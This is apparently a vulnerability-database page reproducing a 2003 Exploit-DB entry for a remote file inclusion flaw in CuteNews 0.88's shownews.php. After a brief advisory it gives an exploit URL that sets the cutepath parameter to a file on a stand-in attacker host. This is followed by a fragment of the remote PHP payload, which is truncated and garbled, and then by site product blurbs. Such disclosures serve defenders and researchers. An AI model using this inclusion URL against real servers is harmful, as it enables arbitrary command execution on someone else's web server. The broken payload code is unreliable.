Lucene search
K

CuteNews 0.88 - 'shownews.php' Remote File Inclusion

🗓️ 25 Feb 2003 00:00:00Reported by Over_GType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

CuteNews 0.88 allows remote file inclusion, leading to risk of arbitrary command execution.

Code
source: https://www.securityfocus.com/bid/6935/info

CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.

Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.

If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server. 

http://www.example.com/cutenews/shownews.php?cutepath=http://<attacker_site>/config.php

----------------------------------config.php----------------------------------------

/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?> 

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation